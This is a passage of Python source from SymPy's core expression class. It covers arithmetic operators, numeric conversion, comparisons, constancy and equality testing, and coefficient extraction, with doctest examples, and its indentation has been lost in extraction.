def __rmul__(self, other):
return Mul(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rpow__')
def __pow__(self, other):
return Pow(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__pow__')
def __rpow__(self, other):
return Pow(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rdiv__')
def __div__(self, other):
return Mul(self, Pow(other, S.NegativeOne))
@_sympifyit('other', NotImplemented)
@call_highest_priority('__div__')
def __rdiv__(self, other):
return Mul(other, Pow(self, S.NegativeOne))
__truediv__ = __div__
__rtruediv__ = __rdiv__
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rmod__')
def __mod__(self, other):
return Mod(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__mod__')
def __rmod__(self, other):
return Mod(other, self)
def __int__(self):
# Although we only need to round to the units position, we'll
# get one more digit so the extra testing below can be avoided
# unless the rounded value rounded to an integer, e.g. if an
# expression were equal to 1.9 and we rounded to the unit position
# we would get a 2 and would not know if this rounded up or not
# without doing a test (as done below). But if we keep an extra
# digit we know that 1.9 is not the same as 1 and there is no
# need for further testing: our int value is correct. If the value
# were 1.99, however, this would round to 2.0 and our int value is
# off by one. So...if our round value is the same as the int value
# (regardless of how much extra work we do to calculate extra decimal
# places) we need to test whether we are off by one.
from sympy import Dummy
r = self.round(2)
if not r.is_Number:
raise TypeError("can't convert complex to int")
if r in (S.NaN, S.Infinity, S.NegativeInfinity):
raise TypeError("can't convert %s to int" % r)
i = int(r)
if not i:
return 0
# off-by-one check
if i == r and not (self - i).equals(0):
isign = 1 if i > 0 else -1
x = Dummy()
# in the following (self - i).evalf(2) will not always work while
# (self - r).evalf(2) and the use of subs does; if the test that
# was added when this comment was added passes, it might be safe
# to simply use sign to compute this rather than doing this by hand:
diff_sign = 1 if (self - x).evalf(2, subs={x: i}) > 0 else -1
if diff_sign != isign:
i -= isign
return i
__long__ = __int__
def __float__(self):
# Don't bother testing if it's a number; if it's not this is going
# to fail, and if it is we still need to check that it evalf'ed to
# a number.
result = self.evalf()
if result.is_Number:
return float(result)
if result.is_number and result.as_real_imag()[1]:
raise TypeError("can't convert complex to float")
raise TypeError("can't convert expression to float")
def __complex__(self):
result = self.evalf()
re, im = result.as_real_imag()
return complex(float(re), float(im))
def __ge__(self, other):
from sympy import GreaterThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s >= %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_nonnegative is not None and \
dif.is_nonnegative is not dif.is_negative:
return sympify(dif.is_nonnegative)
return GreaterThan(self, other, evaluate=False)
def __le__(self, other):
from sympy import LessThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s <= %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_nonpositive is not None and \
dif.is_nonpositive is not dif.is_positive:
return sympify(dif.is_nonpositive)
return LessThan(self, other, evaluate=False)
def __gt__(self, other):
from sympy import StrictGreaterThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s > %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_positive is not None and \
dif.is_positive is not dif.is_nonpositive:
return sympify(dif.is_positive)
return StrictGreaterThan(self, other, evaluate=False)
def __lt__(self, other):
from sympy import StrictLessThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s < %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_negative is not None and \
dif.is_negative is not dif.is_nonnegative:
return sympify(dif.is_negative)
return StrictLessThan(self, other, evaluate=False)
@staticmethod
def _from_mpmath(x, prec):
from sympy import Float
if hasattr(x, "_mpf_"):
return Float._new(x._mpf_, prec)
elif hasattr(x, "_mpc_"):
re, im = x._mpc_
re = Float._new(re, prec)
im = Float._new(im, prec)*S.ImaginaryUnit
return re + im
else:
raise TypeError("expected mpmath number (mpf or mpc)")
@property
def is_number(self):
"""Returns True if 'self' has no free symbols.
It will be faster than `if not self.free_symbols`, however, since
`is_number` will fail as soon as it hits a free symbol.
Examples
========
>>> from sympy import log, Integral
>>> from sympy.abc import x
>>> x.is_number
False
>>> (2*x).is_number
False
>>> (2 + log(2)).is_number
True
>>> (2 + Integral(2, x)).is_number
False
>>> (2 + Integral(2, (x, 1, 2))).is_number
True
"""
return all(obj.is_number for obj in self.args)
def _random(self, n=None, re_min=-1, im_min=-1, re_max=1, im_max=1):
"""Return self evaluated, if possible, replacing free symbols with
random complex values, if necessary.
The random complex value for each free symbol is generated
by the random_complex_number routine giving real and imaginary
parts in the range given by the re_min, re_max, im_min, and im_max
values. The returned value is evaluated to a precision of n
(if given) else the maximum of 15 and the precision needed
to get more than 1 digit of precision. If the expression
could not be evaluated to a number, or could not be evaluated
to more than 1 digit of precision, then None is returned.
Examples
========
>>> from sympy import sqrt
>>> from sympy.abc import x, y
>>> x._random() # doctest: +SKIP
0.0392918155679172 + 0.916050214307199*I
>>> x._random(2) # doctest: +SKIP
-0.77 - 0.87*I
>>> (x + y/2)._random(2) # doctest: +SKIP
-0.57 + 0.16*I
>>> sqrt(2)._random(2)
1.4
See Also
========
sympy.utilities.randtest.random_complex_number
"""
free = self.free_symbols
prec = 1
if free:
from sympy.utilities.randtest import random_complex_number
a, c, b, d = re_min, re_max, im_min, im_max
reps = dict(list(zip(free, [random_complex_number(a, b, c, d, rational=True)
for zi in free])))
try:
nmag = abs(self.evalf(2, subs=reps))
except (ValueError, TypeError):
# if an out of range value resulted in evalf problems
# then return None -- XXX is there a way to know how to
# select a good random number for a given expression?
# e.g. when calculating n! negative values for n should not
# be used
return None
else:
reps = {}
nmag = abs(self.evalf(2))
if not hasattr(nmag, '_prec'):
# e.g. exp_polar(2*I*pi) doesn't evaluate but is_number is True
return None
if nmag._prec == 1:
# increase the precision up to the default maximum
# precision to see if we can get any significance
from mpmath.libmp.libintmath import giant_steps
from sympy.core.evalf import DEFAULT_MAXPREC as target
# evaluate
for prec in giant_steps(2, target):
nmag = abs(self.evalf(prec, subs=reps))
if nmag._prec != 1:
break
if nmag._prec != 1:
if n is None:
n = max(prec, 15)
return self.evalf(n, subs=reps)
# never got any significance
return None
def is_constant(self, *wrt, **flags):
"""Return True if self is constant, False if not, or None if
the constancy could not be determined conclusively.
If an expression has no free symbols then it is a constant. If
there are free symbols it is possible that the expression is a
constant, perhaps (but not necessarily) zero. To test such
expressions, two strategies are tried:
1) numerical evaluation at two random points. If two such evaluations
give two different values and the values have a precision greater than
1 then self is not constant. If the evaluations agree or could not be
obtained with any precision, no decision is made. The numerical testing
is done only if ``wrt`` is different than the free symbols.
2) differentiation with respect to variables in 'wrt' (or all free
symbols if omitted) to see if the expression is constant or not. This
will not always lead to an expression that is zero even though an
expression is constant (see added test in test_expr.py). If
all derivatives are zero then self is constant with respect to the
given symbols.
If neither evaluation nor differentiation can prove the expression is
constant, None is returned unless two numerical values happened to be
the same and the flag ``failing_number`` is True -- in that case the
numerical value will be returned.
If flag simplify=False is passed, self will not be simplified;
the default is True since self should be simplified before testing.
Examples
========
>>> from sympy import cos, sin, Sum, S, pi
>>> from sympy.abc import a, n, x, y
>>> x.is_constant()
False
>>> S(2).is_constant()
True
>>> Sum(x, (x, 1, 10)).is_constant()
True
>>> Sum(x, (x, 1, n)).is_constant()
False
>>> Sum(x, (x, 1, n)).is_constant(y)
True
>>> Sum(x, (x, 1, n)).is_constant(n)
False
>>> Sum(x, (x, 1, n)).is_constant(x)
True
>>> eq = a*cos(x)**2 + a*sin(x)**2 - a
>>> eq.is_constant()
True
>>> eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
True
>>> (0**x).is_constant()
False
>>> x.is_constant()
False
>>> (x**x).is_constant()
False
>>> one = cos(x)**2 + sin(x)**2
>>> one.is_constant()
True
>>> ((one - 1)**(x + 1)).is_constant() in (True, False) # could be 0 or 1
True
"""
simplify = flags.get('simplify', True)
# Except for expressions that contain units, only one of these should
# be necessary since if something is
# known to be a number it should also know that there are no
# free symbols. But is_number quits as soon as it hits a non-number
# whereas free_symbols goes until all free symbols have been collected,
# thus is_number should be faster. But a double check on free symbols
# is made just in case there is a discrepancy between the two.
free = self.free_symbols
if self.is_number or not free:
# if the following assertion fails then that object's free_symbols
# method needs attention: if an expression is a number it cannot
# have free symbols
assert not free
return True
# if we are only interested in some symbols and they are not in the
# free symbols then this expression is constant wrt those symbols
wrt = set(wrt)
if wrt and not wrt & free:
return True
wrt = wrt or free
# simplify unless this has already been done
expr = self
if simplify:
expr = expr.simplify()
# is_zero should be a quick assumptions check; it can be wrong for
# numbers (see test_is_not_constant test), giving False when it
# shouldn't, but hopefully it will never give True unless it is sure.
if expr.is_zero:
return True
# try numerical evaluation to see if we get two different values
failing_number = None
if wrt == free:
# try 0 (for a) and 1 (for b)
try:
a = expr.subs(list(zip(free, [0]*len(free))),
simultaneous=True)
if a is S.NaN:
# evaluation may succeed when substitution fails
a = expr._random(None, 0, 0, 0, 0)
except ZeroDivisionError:
a = None
if a is not None and a is not S.NaN:
try:
b = expr.subs(list(zip(free, [1]*len(free))),
simultaneous=True)
if b is S.NaN:
# evaluation may succeed when substitution fails
b = expr._random(None, 1, 0, 1, 0)
except ZeroDivisionError:
b = None
if b is not None and b is not S.NaN and b.equals(a) is False:
return False
# try random real
b = expr._random(None, -1, 0, 1, 0)
if b is not None and b is not S.NaN and b.equals(a) is False:
return False
# try random complex
b = expr._random()
if b is not None and b is not S.NaN:
if b.equals(a) is False:
return False
failing_number = a if a.is_number else b
# now we will test each wrt symbol (or all free symbols) to see if the
# expression depends on them or not using differentiation. This is
# not sufficient for all expressions, however, so we don't return
# False if we get a derivative other than 0 with free symbols.
for w in wrt:
deriv = expr.diff(w)
if simplify:
deriv = deriv.simplify()
if deriv != 0:
if not (pure_complex(deriv, or_real=True)):
if flags.get('failing_number', False):
return failing_number
elif deriv.free_symbols:
# dead line provided _random returns None in such cases
return None
return False
return True
def equals(self, other, failing_expression=False):
"""Return True if self == other, False if it doesn't, or None. If
failing_expression is True then the expression which did not simplify
to a 0 will be returned instead of None.
If ``self`` is a Number (or complex number) that is not zero, then
the result is False.
If ``self`` is a number and has not evaluated to zero, evalf will be
used to test whether the expression evaluates to zero. If it does so
and the result has significance (i.e. the precision is either -1, for
a Rational result, or is greater than 1) then the evalf value will be
used to return True or False.
"""
from sympy.simplify.simplify import nsimplify, simplify
from sympy.solvers.solvers import solve
from sympy.solvers.solveset import solveset
from sympy.polys.polyerrors import NotAlgebraic
from sympy.polys.numberfields import minimal_polynomial
other = sympify(other)
if self == other:
return True
# they aren't the same so see if we can make the difference 0;
# don't worry about doing simplification steps one at a time
# because if the expression ever goes to 0 then the subsequent
# simplification steps that are done will be very fast.
diff = factor_terms((self - other).simplify(), radical=True)
if not diff:
return True
if not diff.has(Add, Mod):
# if there is no expanding to be done after simplifying
# then this can't be a zero
return False
constant = diff.is_constant(simplify=False, failing_number=True)
if constant is False:
return False
if constant is None and (diff.free_symbols or not diff.is_number):
# e.g. unless the right simplification is done, a symbolic
# zero is possible (see expression of issue 6829: without
# simplification constant will be None).
return
if constant is True:
ndiff = diff._random()
if ndiff:
return False
# sometimes we can use a simplified result to give a clue as to
# what the expression should be; if the expression is *not* zero
# then we should have been able to compute that and so now
# we can just consider the cases where the approximation appears
# to be zero -- we try to prove it via minimal_polynomial.
if diff.is_number:
approx = diff.nsimplify()
if not approx:
# try to prove via self-consistency
surds = [s for s in diff.atoms(Pow) if s.args[0].is_Integer]
# it seems to work better to try big ones first
surds.sort(key=lambda x: -x.args[0])
for s in surds:
try:
# simplify is False here -- this expression has already
# been identified as being hard to identify as zero;
# we will handle the checking ourselves using nsimplify
# to see if we are in the right ballpark or not and if so
# *then* the simplification will be attempted.
if s.is_Symbol:
sol = list(solveset(diff, s))
else:
sol = [s]
if sol:
if s in sol:
return True
if s.is_real:
if any(nsimplify(si, [s]) == s and simplify(si) == s
for si in sol):
return True
except NotImplementedError:
pass
# try to prove with minimal_polynomial but know when
# *not* to use this or else it can take a long time. e.g. issue 8354
if True: # change True to condition that assures non-hang
try:
mp = minimal_polynomial(diff)
if mp.is_Symbol:
return True
return False
except (NotAlgebraic, NotImplementedError):
pass
# diff has not simplified to zero; constant is either None, True
# or the number with significance (prec != 1) that was randomly
# calculated twice as the same value.
if constant not in (True, None) and constant != 0:
return False
if failing_expression:
return diff
return None
def _eval_is_positive(self):
from sympy.polys.numberfields import minimal_polynomial
from sympy.polys.polyerrors import NotAlgebraic
if self.is_number:
if self.is_real is False:
return False
try:
# check to see that we can get a value
n2 = self._eval_evalf(2)
if n2 is None:
raise AttributeError
if n2._prec == 1: # no significance
raise AttributeError
if n2 == S.NaN:
raise AttributeError
except (AttributeError, ValueError):
return None
n, i = self.evalf(2).as_real_imag()
if not i.is_Number or not n.is_Number:
return False
if n._prec != 1 and i._prec != 1:
return bool(not i and n > 0)
elif n._prec == 1 and (not i or i._prec == 1) and \
self.is_algebraic and not self.has(Function):
try:
if minimal_polynomial(self).is_Symbol:
return False
except (NotAlgebraic, NotImplementedError):
pass
def _eval_is_negative(self):
from sympy.polys.numberfields import minimal_polynomial
from sympy.polys.polyerrors import NotAlgebraic
if self.is_number:
if self.is_real is False:
return False
try:
# check to see that we can get a value
n2 = self._eval_evalf(2)
if n2 is None:
raise AttributeError
if n2._prec == 1: # no significance
raise AttributeError
if n2 == S.NaN:
raise AttributeError
except (AttributeError, ValueError):
return None
n, i = self.evalf(2).as_real_imag()
if not i.is_Number or not n.is_Number:
return False
if n._prec != 1 and i._prec != 1:
return bool(not i and n < 0)
elif n._prec == 1 and (not i or i._prec == 1) and \
self.is_algebraic and not self.has(Function):
try:
if minimal_polynomial(self).is_Symbol:
return False
except (NotAlgebraic, NotImplementedError):
pass
def _eval_interval(self, x, a, b):
"""
Returns evaluation over an interval. For most functions this is:
self.subs(x, b) - self.subs(x, a),
possibly using limit() if NaN is returned from subs.
If b or a is None, it only evaluates -self.subs(x, a) or self.subs(b, x),
respectively.
"""
from sympy.series import limit, Limit
if (a is None and b is None):
raise ValueError('Both interval ends cannot be None.')
if a is None:
A = 0
else:
A = self.subs(x, a)
if A.has(S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
A = limit(self, x, a)
if A is S.NaN:
return A
if isinstance(A, Limit):
raise NotImplementedError("Could not compute limit")
if b is None:
B = 0
else:
B = self.subs(x, b)
if B.has(S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
B = limit(self, x, b)
if isinstance(B, Limit):
raise NotImplementedError("Could not compute limit")
return B - A
def _eval_power(self, other):
# subclass to compute self**other for cases when
# other is not NaN, 0, or 1
return None
def _eval_conjugate(self):
if self.is_real:
return self
elif self.is_imaginary:
return -self
def conjugate(self):
from sympy.functions.elementary.complexes import conjugate as c
return c(self)
def _eval_transpose(self):
from sympy.functions.elementary.complexes import conjugate
if self.is_complex:
return self
elif self.is_hermitian:
return conjugate(self)
elif self.is_antihermitian:
return -conjugate(self)
def transpose(self):
from sympy.functions.elementary.complexes import transpose
return transpose(self)
def _eval_adjoint(self):
from sympy.functions.elementary.complexes import conjugate, transpose
if self.is_hermitian:
return self
elif self.is_antihermitian:
return -self
obj = self._eval_conjugate()
if obj is not None:
return transpose(obj)
obj = self._eval_transpose()
if obj is not None:
return conjugate(obj)
def adjoint(self):
from sympy.functions.elementary.complexes import adjoint
return adjoint(self)
@classmethod
def _parse_order(cls, order):
"""Parse and configure the ordering of terms. """
from sympy.polys.orderings import monomial_key
try:
reverse = order.startswith('rev-')
except AttributeError:
reverse = False
else:
if reverse:
order = order[4:]
monom_key = monomial_key(order)
def neg(monom):
result = []
for m in monom:
if isinstance(m, tuple):
result.append(neg(m))
else:
result.append(-m)
return tuple(result)
def key(term):
_, ((re, im), monom, ncpart) = term
monom = neg(monom_key(monom))
ncpart = tuple([e.sort_key(order=order) for e in ncpart])
coeff = ((bool(im), im), (re, im))
return monom, ncpart, coeff
return key, reverse
def as_ordered_factors(self, order=None):
"""Return list of ordered factors (if Mul) else [self]."""
return [self]
def as_ordered_terms(self, order=None, data=False):
"""
Transform an expression to an ordered list of terms.
Examples
========
>>> from sympy import sin, cos
>>> from sympy.abc import x
>>> (sin(x)**2*cos(x) + sin(x)**2 + 1).as_ordered_terms()
[sin(x)**2*cos(x), sin(x)**2, 1]
"""
key, reverse = self._parse_order(order)
terms, gens = self.as_terms()
if not any(term.is_Order for term, _ in terms):
ordered = sorted(terms, key=key, reverse=reverse)
else:
_terms, _order = [], []
for term, repr in terms:
if not term.is_Order:
_terms.append((term, repr))
else:
_order.append((term, repr))
ordered = sorted(_terms, key=key, reverse=True) \
+ sorted(_order, key=key, reverse=True)
if data:
return ordered, gens
else:
return [term for term, _ in ordered]
def as_terms(self):
"""Transform an expression to a list of terms. """
from .add import Add
from .mul import Mul
from .exprtools import decompose_power
gens, terms = set([]), []
for term in Add.make_args(self):
coeff, _term = term.as_coeff_Mul()
coeff = complex(coeff)
cpart, ncpart = {}, []
if _term is not S.One:
for factor in Mul.make_args(_term):
if factor.is_number:
try:
coeff *= complex(factor)
except TypeError:
pass
else:
continue
if factor.is_commutative:
base, exp = decompose_power(factor)
cpart[base] = exp
gens.add(base)
else:
ncpart.append(factor)
coeff = coeff.real, coeff.imag
ncpart = tuple(ncpart)
terms.append((term, (coeff, cpart, ncpart)))
gens = sorted(gens, key=default_sort_key)
k, indices = len(gens), {}
for i, g in enumerate(gens):
indices[g] = i
result = []
for term, (coeff, cpart, ncpart) in terms:
monom = [0]*k
for base, exp in cpart.items():
monom[indices[base]] = exp
result.append((term, (coeff, tuple(monom), ncpart)))
return result, gens
def removeO(self):
"""Removes the additive O(..) symbol if there is one"""
return self
def getO(self):
"""Returns the additive O(..) symbol if there is one, else None."""
return None
def getn(self):
"""
Returns the order of the expression.
The order is determined either from the O(...) term. If there
is no O(...) term, it returns None.
Examples
========
>>> from sympy import O
>>> from sympy.abc import x
>>> (1 + x + O(x**2)).getn()
2
>>> (1 + x).getn()
"""
from sympy import Dummy, Symbol
o = self.getO()
if o is None:
return None
elif o.is_Order:
o = o.expr
if o is S.One:
return S.Zero
if o.is_Symbol:
return S.One
if o.is_Pow:
return o.args[1]
if o.is_Mul: # x**n*log(x)**n or x**n/log(x)**n
for oi in o.args:
if oi.is_Symbol:
return S.One
if oi.is_Pow:
syms = oi.atoms(Symbol)
if len(syms) == 1:
x = syms.pop()
oi = oi.subs(x, Dummy('x', positive=True))
if oi.base.is_Symbol and oi.exp.is_Rational:
return abs(oi.exp)
raise NotImplementedError('not sure of order of %s' % o)
def count_ops(self, visual=None):
"""wrapper for count_ops that returns the operation count."""
from .function import count_ops
return count_ops(self, visual)
def args_cnc(self, cset=False, warn=True, split_1=True):
"""Return [commutative factors, non-commutative factors] of self.
self is treated as a Mul and the ordering of the factors is maintained.
If ``cset`` is True the commutative factors will be returned in a set.
If there were repeated factors (as may happen with an unevaluated Mul)
then an error will be raised unless it is explicitly supressed by
setting ``warn`` to False.
Note: -1 is always separated from a Number unless split_1 is False.
>>> from sympy import symbols, oo
>>> A, B = symbols('A B', commutative=0)
>>> x, y = symbols('x y')
>>> (-2*x*y).args_cnc()
[[-1, 2, x, y], []]
>>> (-2.5*x).args_cnc()
[[-1, 2.5, x], []]
>>> (-2*x*A*B*y).args_cnc()
[[-1, 2, x, y], [A, B]]
>>> (-2*x*A*B*y).args_cnc(split_1=False)
[[-2, x, y], [A, B]]
>>> (-2*x*y).args_cnc(cset=True)
[set([-1, 2, x, y]), []]
The arg is always treated as a Mul:
>>> (-2 + x + A).args_cnc()
[[], [x - 2 + A]]
>>> (-oo).args_cnc() # -oo is a singleton
[[-1, oo], []]
"""
if self.is_Mul:
args = list(self.args)
else:
args = [self]
for i, mi in enumerate(args):
if not mi.is_commutative:
c = args[:i]
nc = args[i:]
break
else:
c = args
nc = []
if c and split_1 and (
c[0].is_Number and
c[0].is_negative and
c[0] is not S.NegativeOne):
c[:1] = [S.NegativeOne, -c[0]]
if cset:
clen = len(c)
c = set(c)
if clen and warn and len(c) != clen:
raise ValueError('repeated commutative arguments: %s' %
[ci for ci in c if list(self.args).count(ci) > 1])
return [c, nc]
def coeff(self, x, n=1, right=False):
"""
Returns the coefficient from the term(s) containing ``x**n`` or None. If ``n``
is zero then all terms independent of ``x`` will be returned.
When x is noncommutative, the coeff to the left (default) or right of x
can be returned. The keyword 'right' is ignored when x is commutative.
See Also
========
as_coefficient: separate the expression into a coefficient and factor
as_coeff_Add: separate the additive constant from an expression
as_coeff_Mul: separate the multiplicative constant from an expression
as_independent: separate x-dependent terms/factors from others
sympy.polys.polytools.coeff_monomial: efficiently find the single coefficient of a monomial in Poly
sympy.polys.polytools.nth: like coeff_monomial but powers of monomial terms are used
Examples
========
>>> from sympy import symbols
>>> from sympy.abc import x, y, z
You can select terms that have an explicit negative in front of them:
>>> (-x + 2*y).coeff(-1)
x
>>> (x - 2*y).coeff(-1)
2*y
You can select terms with no Rational coefficient:
>>> (x + 2*y).coeff(1)
x
>>> (3 + 2*x + 4*x**2).coeff(1)
0
You can select terms independent of x by making n=0; in this case
expr.as_independent(x)[0] is returned (and 0 will be returned instead
of None):
>>> (3 + 2*x + 4*x**2).coeff(x, 0)
3
>>> eq = ((x + 1)**3).expand() + 1
>>> eq
x**3 + 3*x**2 + 3*x + 2
>>> [eq.coeff(x, i) for i in reversed(range(4))]
[1, 3, 3, 2]
>>> eq -= 2
>>> [eq.coeff(x, i) for i in reversed(range(4))]
[1, 3, 3, 0]
You can select terms that have a numerical term in front of them:
>>> (-x - 2*y).coeff(2)
-y
>>> from sympy import sqrt
>>> (x + sqrt(2)*x).coeff(sqrt(2))
x
The matching is exact:
>>> (3 + 2*x + 4*x**2).coeff(x)
2
>>> (3 + 2*x + 4*x**2).coeff(x**2)
4
>>> (3 + 2*x + 4*x**2).coeff(x**3)
0
>>> (z*(x + y)**2).coeff((x + y)**2)
z
>>> (z*(x + y)**2).coeff(x + y)
0
In addition, no factoring is done, so 1 + z*(1 + y) is not obtained
from the following:
>>> (x + z*(x + x*y)).coeff(x)
1
If such factoring is desired, factor_terms can be used first:
>>> from sympy import factor_terms
>>> factor_terms(x + z*(x + x*y)).coeff(x)
z*(y + 1) + 1
>>> n, m, o = symbols('n m o', commutative=False)
>>> n.coeff(n)
1
>>> (3*n).coeff(n)
3
>>> (n*m + m*n*m).coeff(n) # = (1 + m)*n*m
1 + m
>>> (n*m + m*n*m).coeff(n, right=True) # = (1 + m)*n*m
m
If there is more than one possible coefficient 0 is returned:
>>> (n*m + m*n).coeff(n)
0
If there is only one possible coefficient, it is returned:
>>> (n*m + x*m*n).coeff(m*n)
x
>>> (n*m + x*m*n).coeff(m*n, right=1)
1
"""
x = sympify(x)
if not isinstance(x, Basic):
return S.Zero
n = as_int(n)
if not x:
return S.Zero
if x == self:
if n == 1:
return S.One
return S.Zero
if x is S.One:
co = [a for a in Add.make_args(self)
if a.as_coeff_Mul()[0] is S.One]
if not co:
return S.Zero
return Add(*co)
if n == 0:
if x.is_Add and self.is_Add:
c = self.coeff(x, right=right)
if not c:
return S.Zero
if not right:
return self - Add(*[a*x for a in Add.make_args(c)])
return self - Add(*[x*a for a in Add.make_args(c)])
return self.as_independent(x, as_Add=True)[0]
# continue with the full method, looking for this power of x:
x = x**n
def incommon(l1, l2):
if not l1 or not l2:
return []
n = min(len(l1), len(l2))
for i in range(n):
if l1[i] != l2[i]:
return l1[:i]
return l1[:]
def find(l, sub, first=True):
""" Find where list sub appears in list l. When ``first`` is True
the first occurance from the left is returned, else the last
occurance is returned. Return None if sub is not in l.
>> l = range(5)*2
>> find(l, [2, 3])
2
>> find(l, [2, 3], first=0)
7
>> find(l, [2, 4])
None
"""
if not sub or not l or len(sub) > len(l):
return None
n = len(sub)
if not first:
l.reverse()
sub.reverse()
for i in range(0, len(l) - n + 1):
if all(l[i + j] == sub[j] for j in range(n)):
break
else:
i = None
if not first:
l.reverse()
sub.reverse()
if i is not None and not first:
i = len(l) - (i + n)
return i
co = []
args = Add.make_args(self)
self_c = self.is_commutative
x_c = x.is_commutative
if self_c and not x_c:
return S.Zero
if self_c:
xargs = x.args_cnc(cset=True, warn=False)[0]
for a in args:
margs = a.args_cnc(cset=True, warn=False)[0]
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append(Mul(*resid))
if co == []:
return S.Zero
elif co:
return Add(*co)
elif x_c:
xargs = x.args_cnc(cset=True, warn=False)[0]
for a in args:
margs, nc = a.args_cnc(cset=True)
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append(Mul(*(list(resid) + nc)))
if co == []:
return S.Zero
elif co:
return Add(*co)
else: # both nc
xargs, nx = x.args_cnc(cset=True)
# find the parts that pass the commutative terms
for a in args:
margs, nc = a.args_cnc(cset=True)
if len(xargs) > len(margs):
continue
resid = margs.difference(xargs)
if len(resid) + len(xargs) == len(margs):
co.append((resid, nc))
# now check the non-comm parts
if not co:
return S.Zero
if all(n == co[0][1] for r, n in co):
ii = find(co[0][1], nx, right)
if ii is not None:
if not right:
return Mul(Add(*[Mul(*r) for r, c in co]), Mul(*co[0][1][:ii]))
else:
return Mul(*co[0][1][ii + len(nx):])
beg = reduce(incommon, (n[1] for n in co))
if beg:
ii = find(beg, nx, right)
if ii is not None:
if not right:
gcdc = co[0][0]
for i in range(1, len(co)):
gcdc = gcdc.intersection(co[i][0])
if not gcdc:
break
return Mul(*(list(gcdc) + beg[:ii]))
else:
m = ii + len(nx)
return Add(*[Mul(*(list(r) + n[m:])) for r, n in co])
end = list(reversed(
reduce(incommon, (list(reversed(n[1])) for n in co))))
if end:
ii = find(end, nx, right)
if ii is not None:
if not right:
return Add(*[Mul(*(list(r) + n[:-len(end) + ii])) for r, n in co])
else:
return Mul(*end[ii + len(nx):])
# look for single match
hit = None
for i, (r, n) in enumerate(co):
ii = find(n, nx, right)
if ii is not None:
if not hit:
hit = ii, r, n
else:
break
else:
if hit:
ii, r, n = hit
if not right:
return Mul(*(list(r) + n[:ii]))
else:
return Mul(*n[ii + len(nx):])
return S.Zero
def as_expr(self, *gens):
"""
Convert a polynomial to a SymPy expression.
Examples
========
>>> from sympy import sin
>>> from sympy.abc import x, y
>>> f = (x**2 + x*y).as_poly(x, y)
>>> f.as_expr()
x**2 + x*y
>>> sin(x).as_expr()
sin(x)
"""
return self
def as_coefficient(self, expr):
"""
Extracts symbolic coefficient at the given expression. In
other words, this functions separates 'self' into the product
of 'expr' and 'expr'-free coefficient. If such separation
is not possible it will return None.
Examples
========
>>> from sympy import E, pi, sin, I, Poly
>>> from sympy.abc import x
>>> E.as_coefficient(E)
1
>>> (2*E).as_coefficient(E)
2
>>> (2*sin(E)*E).as_coefficient(E)
Two terms have E in them so a sum is returned. (If one were
desiring the coefficient of the term exactly matching E then
the constant from the returned expression could be selected.
Or, for greater precision, a method of Poly can be used to
indicate the desired term from which the coefficient is
desired.)
>>> (2*E + x*E).as_coefficient(E)
x + 2
>>> _.args[0] # just want the exact match
2
>>> p = Poly(2*E + x*E); p
Poly(x*E + 2*E, x, E, domain='ZZ')
>>> p.coeff_monomial(E)
2
>>> p.nth(0, 1)
2
Since the following cannot be written as a product containing
E as a factor, None is returned. (If the coefficient ``2*x`` is
desired then the ``coeff`` method should be used.)
>>> (2*E*x + x).as_coefficient(E)
>>> (2*E*x + x).coeff(E)
2*x
>>> (E*(x + 1) + x).as_coefficient(E)
>>> (2*pi*I).as_coefficient(pi*I)
2
>>> (2*I).as_coefficient(pi*I)
See Also
========
coeff: return sum of terms have a given factor
as_coeff_Add: separate the additive constant from an expression
as_coeff_Mul: separate the multiplicative constant from an expression
as_independent: separate x-dependent terms/factors from others
sympy.polys.polytools.coeff_monomial: efficiently find the single coefficient of a monomial in Poly
sympy.polys.polytools.nth: like coeff_monomial but powers of monomial terms are used
"""
r = self.extract_multiplicatively(expr)
if r and not r.has(expr):
return r
def as_independent(self, *deps, **hint):
"""
A mostly naive separation of a Mul or Add into arguments that are not
are dependent on deps. To obtain as complete a separation of variables
as possible, use a separation method first, e.g.:
* separatevars() to change Mul, Add and Pow (including exp) into Mul
* .expand(mul=True) to change Add or Mul into Add
* .expand(log=True) to change log expr into an Add
The only non-naive thing that is done here is to respect noncommutative
ordering of variables and to always return (0, 0) for `self` of zero
regardless of hints.
For nonzero `self`, the returned tuple (i, d) has the
following interpretation:
* i will has no variable that appears in deps
* d will be 1 or else have terms that contain variables that are in deps
* if self is an Add then self = i + d
* if self is a Mul then self = i*d
* otherwise (self, S.One) or (S.One, self) is returned.
To force the expression to be treated as an Add, use the hint as_Add=True
Examples
========
-- self is an Add
>>> from sympy import sin, cos, exp
>>> from sympy.abc import x, y, z
>>> (x + x*y).as_independent(x)
(0, x*y + x)
>>> (x + x*y).as_independent(y)
(x, x*y)
